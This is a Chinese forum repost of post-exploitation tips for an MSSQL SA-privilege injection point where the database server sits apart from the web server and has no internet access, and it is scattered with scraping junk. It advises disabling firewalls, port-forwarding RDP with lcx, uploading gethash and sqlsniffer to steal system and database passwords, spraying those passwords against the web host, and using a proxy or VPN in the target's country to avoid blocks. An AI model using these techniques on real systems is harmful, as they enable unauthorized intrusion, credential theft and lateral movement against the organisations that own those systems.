当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
- a4 G7 h: n1 }0 q
$ [ e9 q6 e- [. T) r* _; b+ W, R- L% V
/ l, _7 Q9 O6 z% r8 JSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
7 J* c! W2 E# E9 D% z" f6 u* f
; v8 O" J6 r4 r* }
; `! w/ a9 a- B一、DB机有公网IP.
/ g e# V+ C6 F4 _1 d2 q( e+ J0 f Y+ d+ J; t6 W+ ]+ j
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.- Y3 I" o6 S, R
% x) K0 [# X! ~4 P6 X4 ?
! s+ E( o# T* t0 O( u4 n% [
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
7 |7 O" F$ S$ h+ h q3 k- T+ S* Y6 c- N3 {! K: m% X
' h2 ~0 V7 W* C9 `4 P/ X. ]! @; R
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com& P. N# N) A: `
) R2 J6 }' D; u" e
9 ~( U% Y" ]" |2 R2 i5 o' ^1 l" u4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.0 S# [% V# p; a4 X0 G' L( r
: @ ~: v0 q+ H: g' v8 h6 Z- K
% e8 g# `2 X) c* p9 V/ a
& i! z# m' a8 V) \3 Z/ d8 j0 a二、DB机只有内网IP
" ?, t) O; F8 A; ?# n3 Z: \4 w, Q
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
6 t |" [1 s" } _/ J& z1 S# N; @) ?7 |6 z. I0 [
( z5 m0 M! T+ Q; g* x( t$ ?3 G5 f6 s
2:停掉防火墙和IP策略再从内往外扫描.6 S+ y% R* P* {" e0 _: E
. D, G& o& ?% ]6 U1 J1 L$ P
" W# q# ?6 h+ `& I6 J! }$ H3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.4 q% q/ k k% c0 N+ o/ s
# I3 e. L3 X3 }$ j
7 r$ a* b+ d! D, B' C4:学会密码规律分析往往会有惊喜.
1 c) P3 W1 E6 x( \
5 O7 M( {" Y$ `$ o* I: e& s; ?9 `) z# S& _! y5 b; J0 D% Q: P
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等: p# t+ K- ?% l
6 B! F/ F3 k/ r }. b8 g& D, h# o/ D8 m
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对